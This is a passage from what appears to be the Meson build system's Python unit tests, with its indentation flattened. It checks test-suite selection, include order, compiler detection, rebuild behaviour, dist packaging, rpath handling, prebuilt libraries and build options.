self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
@mock.patch.dict(os.environ)
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf does not respect the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
